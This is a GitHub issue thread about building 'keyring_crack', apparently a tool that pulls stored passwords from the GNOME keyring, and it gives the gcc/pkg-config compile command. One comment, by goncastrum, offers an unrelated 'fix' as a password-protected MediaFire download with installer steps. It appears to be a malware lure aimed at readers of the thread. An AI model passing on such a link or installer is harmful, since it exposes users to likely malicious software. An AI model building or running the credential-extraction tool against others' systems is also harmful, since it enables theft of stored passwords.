### ISSUE TITLE
Build instructions with pkg-config 

### ISSUE THREAD

**Issue by doggodanubus** [sungjungk/keyring_crack#2]
gcc `pkg-config -cflags libsecret-1` `pkg-config -libs libsecret-1` keyring_crack.c -o keycrack

And the first time it crashes.

Then it starts working and it's perfect. Something that Seahorseytard should do by default.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by doggodanubus** [comment]
Ugh lemme see if this works. No code *ks with it.

**Comment by doggodanubus** [comment]
Git hub  screws with my fix. You use **\` Grave Accent** before and after the pkg-config commands.  I used backslash to force it to print but it may copy wrong. 

gcc \`pkg-config -cflags libsecret-1\` \`pkg-config -libs libsecret-1\` keyring_crack.c -o keycrack

> gcc `pkg-config -cflags libsecret-1` `pkg-config -libs libsecret-1` keyring_crack.c -o keycrack
> 
> And the first time it crashes.
> 
> Then it starts working and it's perfect. Something that Seahorseytard should do by default is to spit out an export file.
